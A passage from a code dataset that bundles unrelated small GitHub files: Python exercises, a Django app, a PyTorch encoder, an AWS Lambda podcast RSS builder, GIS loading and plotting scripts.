'notifyentry.html',context)","repo_name":"AshwinJd/Organic-Dairy-Farm","sub_path":"cattle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14216212852","text":"import sys\n# from collections import Counter\n\n\ndef max_occur_char(s):\n count = {}\n max_count = -sys.maxsize\n max_char = ''\n for c in s:\n if c in count:\n count[c] += 1\n else:\n count[c] = 1\n if count[c] > max_count:\n max_count = count[c]\n max_char = c\n return max_char, max_count\n\n\n# def max_occur_char(s):\n# counter = Counter(s)\n# max_count = -sys.maxsize\n# max_char = ''\n# for ch, count in counter.items():\n# if count > max_count:\n# max_count = count\n# max_char = ch\n# return max_char, max_count\n\n\nprint(max_occur_char('thequickbrownfoxjumpsover'))\n","repo_name":"vpc20/python-strings-and-things","sub_path":"MaxOccuringChar.py","file_name":"MaxOccuringChar.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10125441035","text":"\"\"\"Given the head of a singly linked list, reverse the list, and return the reversed list.\n\n \n\nExample 1:\n\n\nInput: head = [1,2,3,4,5]\nOutput: [5,4,3,2,1]\nExample 2:\n\n\nInput: head = [1,2]\nOutput: [2,1]\nExample 3:\n\nInput: head = []\nOutput: []\n \n\nConstraints:\n\nThe number of nodes in the list is the range [0, 5000].\n-5000 <= Node.val <= 5000\"\"\"\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head:\n return head\n if not head.next:\n return head\n stack = []\n cur = head\n while cur.next:\n stack.append(cur)\n cur = cur.next\n start = cur\n while stack:\n cur.next = stack.pop()\n cur = cur.next\n cur.next = None\n return start","repo_name":"nicokuzak/leetcode","sub_path":"easy/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30876773543","text":"#example script which looks a linearly coupled beam as seen by two bpms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n####Independent Horizontal and Vertical, tilted bpms\n#particle oscillates independently in two planes\nQx = 6.7421\nQy = 6.8776\ntnum = 10000\nt = np.arange(tnum)\n#x,y at first bpm\nx1 = np.cos(2*np.pi*Qx*t)\ny1 = np.sin(2*np.pi*Qy*t)\n#x,y at second bpm\nbpm21_phase = np.pi/2.0\nx2 = np.cos(2*np.pi*Qx*t+bpm21_phase)\ny2 = np.sin(2*np.pi*Qy*t+bpm21_phase)\n\n#each bpm has a tilt which mixes the two degrees of freedom.\nbpm1_tilt = 5.0*(np.pi/180.0)\nbpm2_tilt = -15.0*(np.pi/180.0)\nbpm_x1 = np.cos(bpm1_tilt)*x1 + np.sin(bpm1_tilt)*y1\nbpm_y1 = -np.sin(bpm1_tilt)*x1 + np.cos(bpm1_tilt)*y1\nbpm_x2 = np.cos(bpm1_tilt)*x2 + np.sin(bpm1_tilt)*y2\nbpm_y2 = -np.sin(bpm1_tilt)*x2 + np.cos(bpm1_tilt)*y2\n\n#plot x1 vs x2 as seen by bpms over 100 turns\nplt.scatter(bpm_x1[0:100],bpm_x2[0:100])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 from BPMs, all data')\nplt.savefig('lec3_poincare_1.png', bbox_inches='tight')\nplt.show()\n\n#plot x1 vs x2 as seen by bpms over 10000 turns, but only when y1 = 0, y2 > 0\npoincare_y = np.logical_and( (np.abs(bpm_y1-0) <0.05), bpm_y2 > 0)\nplt.scatter(bpm_x1[poincare_y],bpm_x2[poincare_y])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 from BPMs, y1 = 0, y2>0')\nplt.savefig('lec3_poincare_2.png', bbox_inches='tight')\nplt.show()\n\n####Linearly Coupled Horizontal and Vertical, precise bpms\n#tunes\nQx = 0.78\nQy = 0.80\n#linear coupling resonance parameters\nG = 0.05\nlam = np.sqrt((Qx-Qy)**2 + G**2)\ndelt = np.abs(Qx-Qy)\nQ = G/(lam+delt)\nQa = 1/(1+Q**2)\nQb = Q/(1+Q**2)\n#linearly coupled tunes\nQp = 0.5*(Qx+Qy)+0.5*lam\nQm = 0.5*(Qx+Qy)-0.5*lam\ncp = np.cos(2*np.pi*Qp)\nsp = np.sin(2*np.pi*Qp)\ncm = np.cos(2*np.pi*Qm)\nsm = np.sin(2*np.pi*Qm)\n\n\n#transfer matrices for linear couppling\nU = np.matrix([[Qa, 0, Qb, 0], [0, Qa, 0, Qb], [-Qb, 0, Qa, 0], [0, -Qb, 0, Qa]])\nR = np.matrix([[cp, sp, 0, 0], [-sp, cp, 0, 0], [0, 0, cm, sm], [0, 0, -sm, cm]])\nM=np.matmul(R,U)\nM=np.matmul(np.linalg.inv(U),M)\n\ntnum = 10000\nx = np.zeros((tnum,4))\n#this vector represents x1, x2, y1, y2\nx[0,:] = [1,0,0,0]\n#calculate vector of tnum turns\nfor lp in range(1,tnum):\n x[lp,:] = np.dot(M,x[(lp-1),:])\n\n#plot x1 vs x2 as seen by bpms over 1000 turns\nplt.scatter(x[0:1000,0],x[0:1000,1])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 with Coupling, all data')\nplt.savefig('lec3_poincare_3.png', bbox_inches='tight')\nplt.show()\n\n#plot x1 vs x2 as seen by bpms over 10000 turns, but only when y1 = 0, y2 > 0\npoincare_y = np.logical_and( (np.abs(x[:,2]-0) <0.05), (np.abs(x[:,3]-0) <0.05))\nplt.scatter(x[poincare_y,0],x[poincare_y,1])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 with Coupling, y1 = 0, y2 = 0')\nplt.savefig('lec3_poincare_4.png', bbox_inches='tight')\nplt.show()\n","repo_name":"jseldred/USPAS_Python_2022","sub_path":"lectures/lec3_poincare.py","file_name":"lec3_poincare.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9203529616","text":"import torch.nn as nn\n\nfrom cherry_rl.algorithms.nn.conv_encoders import init, cnn_forward\n\n\nclass Encoder(nn.Module):\n def __init__(self, layer_norm=False):\n super().__init__()\n\n gain = nn.init.calculate_gain('relu')\n self.conv = nn.Sequential(\n init(nn.Conv2d(4, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n )\n self.linear = nn.Sequential(\n init(nn.Linear(32 * 6 * 6, 512), gain=gain), nn.ReLU()\n )\n self.layer_norm = None\n if layer_norm:\n self.layer_norm = nn.LayerNorm(512)\n\n def forward(self, observation):\n cnn_out = cnn_forward(self.conv, observation)\n linear_out = self.linear(cnn_out)\n if self.layer_norm is not None:\n linear_out = self.layer_norm(linear_out)\n return linear_out\n","repo_name":"CherryPieSexy/rl_mario","sub_path":"src/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"40195955844","text":"from django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('nosotros/', views.nosotros, name='nosotros'),\r\n path('servicios/', views.servicios, name='servicios'),\r\n path('contacto/', views.contacto, name='contacto'),\r\n path('reserva/', views.reserva, name='reserva'),\r\n path('inventario/', views.inventario, name='inventario'),\r\n\r\n\r\n]\r\n","repo_name":"nadiadecar/Pagina_web","sub_path":"tarea-3-grupo-16/Tarea2/peluqueria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23959191164","text":"#!/usr/bin/env python3\n\nclass Animal(object):\n __slots__ = ('name', 'age') # 限定 Animal 类只能定义 name 和 age 属性\n\n\nclass Cat(Animal):\n __slots__ = ('address')\n\n\ndog = Animal()\ndog.name = 'wangcai'\ndog.age = 2\n# dog.gender = 'male' # dog 是 Animal 的实例化对象,无法定义 gender 属性\n\"\"\"\n^^^报错\ndog.gender = 'male' # dog 是 Animal 的实例化对象,无法定义 gender 属性\nAttributeError: 'Animal' object has no attribute 'gender'\n\"\"\"\n\ncat = Cat()\ncat.gender = 'male' # 无法定义 gender 属性\ncat.address = 'chengdu'\ncat.name = 'tom' # 由于 Cat 继承的是 Animal 所以可以定义 name 属性\n\"\"\"\n^^^报错\ncat.gender = 'male' # 无法定义 gender 属性\nAttributeError: 'Cat' object has no attribute 'gender'\n\"\"\"\n","repo_name":"Achang0121/achangPython","sub_path":"animal_2.py","file_name":"animal_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3127640178","text":"from xml.etree.ElementTree import Element, SubElement\nfrom xml.etree import ElementTree\nimport boto3, os, time\nfrom xml.dom import minidom\nimport urllib\n\n# import environment variables #########################################################################################\ncloudfront_content = os.environ['cloudfront_content'] # content cloudfront url\npodcast_name = os.environ['podcast_name'] # podcast name\npodcast_subtitle = os.environ['podcast_subtitle'] # podcast subtitle\npodcast_author = os.environ['podcast_author'] # podcast author\npodcast_desc = os.environ['podcast_desc'] # podcast description\npodcast_url = os.environ['podcast_url'] # feed url\npodcast_img_url = os.environ['podcast_img_url'] # link to podcast image url\npodcast_type = os.environ['podcast_type'] # type of podcast\npodcast_xml_file_name = os.environ['podcast_xml_file_name'] # ex. podcast.xml\ns3_bucket_trigger = os.environ['s3_bucket_trigger'] # trigger bucket name here\ns3_bucket_rss = os.environ['s3_bucket_rss'] # xml host bucket name here\nemail = os.environ['email'] # email here\ncopyright_text = os.environ['copyright_text'] # copyright text here\nlanguage = os.environ['language'] # ex. en-us\nwebsite = os.environ['website'] # www.example.com\ncategory_one = os.environ['category_one'] # category\nsub_category_one = os.environ['sub_category_one'] # subcategory\ncategory_two = os.environ['category_two'] # category two\nsub_category_two = os.environ['sub_category_two'] # subcategory two\nexplicit = os.environ['explicit'] # yes, no\n\n# reformat the xml #####################################################################################################\n\n\ndef prettify(elem):\n \"\"\"Return a pretty-printed XML string for the Element.\n \"\"\"\n rough_string = ElementTree.tostring(elem)\n reparsed = minidom.parseString(rough_string)\n return reparsed.toprettyxml(indent=\"\\t\", newl=\"\\n\", encoding='UTF-8')\n\n# create the XML document root #########################################################################################\n\n\ndef make_feed():\n \"\"\"Generate xml file\n \"\"\"\n rss = Element('rss', version='2.0')\n # headers ##########################################################################################################\n rss.set('xmlns:atom', 'http://www.w3.org/2005/Atom')\n rss.set('xmlns:itunes', 'http://www.itunes.com/dtds/podcast-1.0.dtd')\n rss.set('xmlns:content', 'http://purl.org/rss/1.0/modules/content/')\n rss.set('xmlns:googleplay', 'http://www.google.com/schemas/play-podcasts/1.0')\n # channel - podcast defined here ###################################################################################\n channel = SubElement(rss, 'channel')\n SubElement(channel, 'generator').text = \"https://github.com/goehlemichael/terraform-podcast\"\n SubElement(channel, 'title').text = podcast_name\n SubElement(channel, 'itunes:subtitle').text = podcast_subtitle\n SubElement(channel, 'atom:link', href=podcast_url, rel='self', type='application/rss+xml')\n SubElement(channel, 'link',).text = website\n SubElement(channel, 'itunes:author').text = podcast_author\n SubElement(channel, 'itunes:explicit').text = explicit\n SubElement(channel, 'description').text = podcast_desc\n SubElement(channel, 'itunes:type').text = podcast_type\n # channel - owner ##################################################################################################\n owner = SubElement(channel, 'itunes:owner')\n SubElement(owner, 'itunes:name').text = podcast_name\n SubElement(owner, 'itunes:email').text = email\n SubElement(channel, 'managingEditor').text = email\n SubElement(channel, 'webMaster').text = email\n # END owner ########################################################################################################\n SubElement(channel, 'itunes:summary').text = podcast_desc\n SubElement(channel, 'itunes:image', href=podcast_img_url)\n # Category #########################################################################################################\n category = SubElement(channel, 'itunes:category', text=category_one)\n SubElement(category, 'itunes:category', text=sub_category_one)\n # END category 1####################################################################################################\n # category two #####################################################################################################\n category_two_rss = SubElement(channel, 'itunes:category', text=category_two)\n SubElement(category_two_rss, 'itunes:category', text=sub_category_two)\n # end category two #################################################################################################\n SubElement(channel, 'language').text = language\n SubElement(channel, 'copyright').text = copyright_text\n SubElement(channel, 'lastBuildDate').text = time.strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n SubElement(channel, 'pubDate').text = time.strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n # channel - image ##################################################################################################\n image = SubElement(channel, 'image')\n SubElement(image, 'url').text = podcast_img_url\n SubElement(image, 'title').text = podcast_name\n SubElement(image, 'link').text = podcast_url\n # END image ########################################################################################################\n\n s3_bucket_object = boto3.client('s3')\n content_list = s3_bucket_object.list_objects_v2(Bucket=s3_bucket_trigger)\n\n # for each object in the bucket create relevant xml tags ###########################################################\n def get_episode_info(each_s3_object, cloudfront_content):\n episode_folder, episode_title = each_s3_object['Key'].split('/')\n\n # retrieve publish date ########################################################################################\n publish_date_url = cloudfront_content + urllib.parse.quote(episode_folder + '/pubdate.txt')\n publish_date = urllib.request.urlopen(publish_date_url).read().decode('utf-8')\n\n # retrieve episode image #######################################################################################\n episode_image_url = cloudfront_content + urllib.parse.quote(episode_folder + '/image.jpeg')\n\n # retrieve episode duration ####################################################################################\n duration_url = cloudfront_content + urllib.parse.quote(episode_folder + '/duration.txt')\n duration = urllib.request.urlopen(duration_url).read().decode('utf-8')\n\n # retrieve episode description #################################################################################\n description_url = cloudfront_content + urllib.parse.quote(episode_folder + '/description.txt')\n description_text = urllib.request.urlopen(description_url).read().decode('utf-8')\n\n # retrieve episode title #######################################################################################\n title_url = cloudfront_content + urllib.parse.quote(episode_folder + '/title.txt')\n title_text = urllib.request.urlopen(title_url).read().decode('utf-8')\n\n # retrieve episode type ########################################################################################\n episode_type_url = cloudfront_content + urllib.parse.quote(episode_folder + '/episodetype.txt')\n episode_type_text = urllib.request.urlopen(episode_type_url).read().decode('utf-8')\n\n # build XML item element #######################################################################################\n item = SubElement(channel, 'item')\n SubElement(item, 'description').text = description_text\n SubElement(item, 'itunes:image', href=episode_image_url)\n SubElement(item, 'title').text = title_text\n SubElement(item, 'pubDate').text = publish_date\n SubElement(item, 'itunes:duration').text = duration\n SubElement(item, 'itunes:episodeType').text = episode_type_text\n SubElement(item, 'link').text = cloudfront_content + urllib.parse.quote(each_s3_object['Key'])\n\n # retrieve episode media URL ###################################################################################\n media_resource = each_s3_object['Key']\n media_url = cloudfront_content + urllib.parse.quote(media_resource)\n SubElement(item, 'enclosure', url=media_url, length=str(each_s3_object['Size']), type='audio/mpeg')\n SubElement(item, 'guid').text = cloudfront_content + urllib.parse.quote(media_resource)\n\n # iterate through S3 objects and retrieve episode information ######################################################\n for each_s3_object in content_list['Contents']:\n if '.mp3' in each_s3_object['Key']:\n get_episode_info(each_s3_object, cloudfront_content)\n\n if '.m4a' in each_s3_object['Key']:\n get_episode_info(each_s3_object, cloudfront_content)\n\n # upload the podcast.xml file to S3 ################################################################################\n create_podcast_file_content = prettify(rss)\n s3_bucket_object.put_object(\n Bucket=s3_bucket_rss,\n Body=create_podcast_file_content,\n Key=podcast_xml_file_name,\n ContentType='application/xml'\n )\n\n\ndef handler(event, context):\n make_feed()\n","repo_name":"goehlemichael/terraform-podcast","sub_path":"modules/aws_podcast/podcast.py","file_name":"podcast.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40604063706","text":"import os\nimport map\nimport zipfile\nfrom django.contrib.gis.gdal import DataSource\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import Road, SchoolDistrict\n\nelsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'ELSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\nscsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'SCSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\nunsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'UNSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\n\nmappings={'unsd':unsd,'scsd':scsd,'elsd':elsd}\n\ndata = os.path.join(os.path.dirname(map.__file__),'data')\n# Auto-generated `LayerMapping` dictionary for Road model\ndef run(verbose=True):\n \"\"\"\n for county in os.listdir(data):\n lm = LayerMapping(\n Road, os.path.join(data,county,county+'.shp'), road_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)\n \"\"\"\n for z in os.listdir(data+'/zipped/'):\n zipname = z[:len(z)-4]\n zf = zipfile.ZipFile(data+'/zipped/'+z,mode='r')\n zf.extractall(path=os.path.join(data,'unzipped',zipname))\n shp=os.path.join(data,'unzipped',zipname,zipname+'.shp')\n distype = zipname[len(zipname)-4:]\n\n\n lm = LayerMapping(\n SchoolDistrict, shp, mappings[distype],\n transform=False, encoding='iso-8859-1',\n )\n\n lm.save(strict=True, verbose=verbose,progress=True)\n","repo_name":"joreymelinder/snakeroute","sub_path":"map/loadDistricts.py","file_name":"loadDistricts.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632900670","text":"from django.contrib import admin\nfrom .models import Company\n\n\n@admin.register(Company)\nclass CompanyAdmin(admin.ModelAdmin):\n fieldsets = (\n ('Current Company', {\n \"fields\": (\n ('cnpj', 'fantasy_name'), ('social_reason',\n 'state_registration'), 'open_date', 'address', 'logo'\n ),\n }),\n )\n raw_id_fields = ('address',)\n list_display = ('id', 'fantasy_name', 'social_reason',\n 'cnpj', 'state_registration', 'open_date', 'address')\n search_fields = ('fantasy_name', 'cnpj')\n","repo_name":"linkinn/projectBBK","sub_path":"apps/company/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22554284862","text":"import os, sys, logging, json \nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\ndef make_logger(log):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n \n # formatter\n file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s:%(lineno)d] -- %(message)s\")\n # file_handler\n file_handler = logging.FileHandler(log, mode='w')\n file_handler.setFormatter(file_formatter)\n file_handler.setLevel(logging.INFO)\n # logger.add\n logger.addHandler(file_handler)\n \n return logger\n\ndef makeOutputPath(file_path, file_dir, output_dir, Ext):\n root, file = os.path.split(file_path)\n filename, ext = os.path.splitext(file)\n relpath = os.path.relpath(file_path, file_dir)\n mid_dir = os.path.split(relpath)[0]\n output_path = os.path.join(output_dir, mid_dir, f\"{filename}.{Ext}\")\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n\n return output_path\n\ndef readJson(path):\n with open(path, 'r', encoding='utf-8') as f:\n data = json.load(f)\n return data\n\ndef saveJson(file, path):\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(file, f, indent=2, ensure_ascii=False)\n \ndef readfiles(dir):\n file_dict = defaultdict(list)\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n ext = ext.lower() \n if ext == '.json':\n folder = os.path.split(root)[-1]\n file_path = os.path.join(root, file)\n\n file_dict[folder].append(file_path)\n\n return file_dict\n\ndef get_objects(data):\n obj = data['objects']\n\n if type(obj) == dict:\n obj = [obj]\n\n return obj\n\ndef collect_objects(folder, path):\n data = readJson(path)\n obj = get_objects(data)\n for o in obj:\n _class = o['class']\n _sub_class1 = o[\"sub_class1\"]\n _sub_class2 = o[\"sub_class2\"]\n _id = o['HDP_VRFC']['id']\n \n count_dict[folder][_id].append({'path':path, 'class':_class, 'sub_class1':_sub_class1, 'sub_class2':_sub_class2}) \n\ndef revise_objects(count_dict, folder, path, output_path):\n data = readJson(path)\n if type(data['objects']) == list:\n for idx, o in enumerate(data['objects']):\n _id = o['HDP_VRFC']['id']\n value = count_dict[folder][_id]\n front = o['include_class']['front']\n if data['objects'][idx]['class'] != value['class'] or data['objects'][idx][\"sub_class1\"] != value['sub_class1'] or data['objects'][idx][\"sub_class2\"] != value['sub_class2']:\n data['objects'][idx]['class'] = value['class']\n data['objects'][idx][\"sub_class1\"] = value['sub_class1']\n data['objects'][idx][\"sub_class2\"] = value['sub_class2']\n revise_list.append([path, output_path])\n if front:\n if front[0]['class'] != value['class'].split(' ')[0] or front[0]['sub_class1'] != value['sub_class1'] or front[0]['sub_class2'] != value['sub_class2']:\n front[0]['class'] = value['class'].split(' ')[0]\n front[0]['sub_class1'] = value['sub_class1']\n front[0]['sub_class2'] = value['sub_class2']\n revise_list.append([path, output_path])\n\n elif type(data['objects']) == dict:\n _id = data['objects']['HDP_VRFC']['id']\n value = count_dict[folder][_id]\n front = data['objects']['include_class']['front']\n \n if data['objects'][idx]['class'] != value['class'] or data['objects'][idx][\"sub_class1\"] != value['sub_class1'] or data['objects'][idx][\"sub_class2\"] != value['sub_class2']:\n data['objects']['class'] = value['class']\n data['objects'][\"sub_class1\"] = value['sub_class1']\n data['objects'][\"sub_class2\"] = value['sub_class2']\n revise_list.append([path, output_path])\n\n if front:\n if front[0]['class'] != value['class'].split(' ')[0] or front[0]['sub_class1'] != value['sub_class1'] or front[0]['sub_class2'] != value['sub_class2']:\n front[0]['class'] = value['class'].split(' ')[0]\n front[0]['sub_class1'] = value['sub_class1']\n front[0]['sub_class2'] = value['sub_class2']\n revise_list.append([path, output_path])\n\n saveJson(data, output_path)\n \ndef get_max_value(_list, key):\n data = [i[key] for i in _list]\n val = max(set(data), key=data.count)\n return val\n \ndef sorted_dict(_dict):\n for f, _i in _dict.items():\n for i, c in _i.items():\n if len(c) <= 2:\n for j in c:\n special_list.append([f, j['path'], i])\n \n _class = get_max_value(c, 'class')\n _sub_class1 = get_max_value(c, 'sub_class1')\n _sub_class2 = get_max_value(c, 'sub_class2')\n\n _dict[f][i] = {'class':_class, 'sub_class1':_sub_class1, 'sub_class2':_sub_class2}\n \n return _dict\n\ndef make_excel(_list, col, output_excel_path):\n df = pd.DataFrame(_list, columns=col)\n df.to_excel(output_excel_path, index=False)\n \nif __name__ == \"__main__\":\n _, input_dir, output_dir = sys.argv\n \n logger = make_logger('in_id_log.log')\n \n json_dict = readfiles(input_dir)\n\n count_dict = defaultdict(lambda : defaultdict(list))\n\n for folder, json_path_list in tqdm(json_dict.items(), desc='collecting id..!'):\n for json_path in json_path_list:\n logger.info(f\"{json_path} collecting id\")\n collect_objects(folder, json_path)\n \n special_list = []\n count_dict = sorted_dict(count_dict)\n \n revise_list = []\n for folder, json_path_list in tqdm(json_dict.items(), desc='revise class..!'):\n for json_path in json_path_list:\n logger.info(f\"{json_path} revise class\")\n output_json_path = makeOutputPath(json_path, input_dir, output_dir, 'json')\n revise_objects(count_dict, folder, json_path, output_json_path)\n \n make_excel(special_list, ['sequence', 'file_path', 'id'], f\"{output_dir}/special_list.xlsx\")\n make_excel(revise_list, ['input_file_path', 'output_file_path'], f\"{output_dir}/revise_list.xlsx\")\n \n\n ","repo_name":"tkdalsrb123/Alchera","sub_path":"11/1122_json_revise_error_class/revise_error_class.py","file_name":"revise_error_class.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2624185153","text":"import matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imread\n\nimg = imread(\"Cat.jpg\") #зчитування зображення\n\nimg_ = img/255\nimg_gray = img_ @ [0.3, 0.59, 0.11]\n\nhist_ = img_gray.flatten()\nplt.hist(x = hist_, bins=256, color='gray', label='перехід до відтінків сірого') #побудова гістрограми переходу до відтінків сірого\n\nplt.legend(loc='best') #лагенда\nplt.suptitle('Task 4\\n Гістрограма переходу до відтінків сірого') #визначення заголовків\nplt.show()","repo_name":"TylBohdan/yopi","sub_path":"kgvproject/Task4_4.py","file_name":"Task4_4.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31384726277","text":"with open('outofplace.in','r') as fin:\n lines=fin.readlines()\n\nn=int(lines[0])\nheights=[int(line) for line in lines[1:]]\n#sort heights\nsorted_heights=sorted(heights)\n\nresult=-1\n#iterate through heights and sorted heights\nfor i in range(len(heights)):\n #swap every time the heights in both lists are different\n if heights[i]!=sorted_heights[i]:\n result+=1\n\nwith open('outofplace.out','w') as fout:\n fout.write(str(max(0,result))+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2017-18/bronze/jan/outofplace.py","file_name":"outofplace.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15773133804","text":"import numpy\nfrom matplotlib import pyplot\n\n\ndef draw_points_on_map(map_file, points_file, bounds, output):\n import json\n with open(points_file) as f:\n points = json.load(f)\n\n from PIL import Image\n Image.MAX_IMAGE_PIXELS = 192000000\n\n image = Image.open(map_file)\n dpi = 80\n import matplotlib.pyplot as plt\n # plt.rcParams.update({'font.size': 60})\n\n fig, ax = plt.subplots(figsize=(image.width / dpi, image.height / dpi), dpi=dpi)\n ax.imshow(image, origin=\"upper\", extent=bounds, aspect=\"auto\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"left\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(False)\n ax.set_xticks(numpy.linspace(*bounds[0:2], 10))\n ax.set_yticks(numpy.linspace(*bounds[2:4], 10))\n\n points = []\n\n for i, point in enumerate(points):\n ax.scatter(*point,\n marker=\"v\",\n s=1000,\n color=(1.0, 1.0, 1.0),\n label=f\"{i}\")\n ax.annotate(str(i), point)\n\n fig.tight_layout()\n ax.set_xlim(bounds[0], bounds[1])\n ax.set_ylim(bounds[2], bounds[3])\n ax.set_xlabel(\"h\")\n ax.set_ylabel(\"α\")\n\n fig.tight_layout()\n fig.savefig(output)\n pyplot.close(fig)\n\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_001_inc_20200518-162846.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_001.png\"\n# )\n\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_0001_inc_20200518-163151.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_0001.png\"\n# )\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_00001_inc_20200518-163457.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_00001.png\"\n# )\n\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_0.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_0.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_01.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_01.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_001.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_0001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 